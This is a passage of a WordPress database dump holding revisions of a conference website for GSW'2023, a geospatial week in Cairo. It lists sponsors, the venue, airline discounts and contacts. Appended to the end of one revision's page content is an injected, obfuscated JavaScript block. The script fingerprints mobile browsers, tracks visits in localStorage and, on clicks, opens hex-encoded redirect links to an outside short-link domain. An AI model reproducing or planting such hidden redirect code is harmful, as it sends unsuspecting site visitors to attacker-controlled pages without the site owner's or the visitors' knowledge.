held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-10 00:36:33','2023-07-10 00:36:33','',3066,'https://gsw2023.com/?p=4982',0,'revision','',0),
(4984,1,'2023-07-10 00:39:25','2023-07-10 00:39:25','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1687571540500{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button 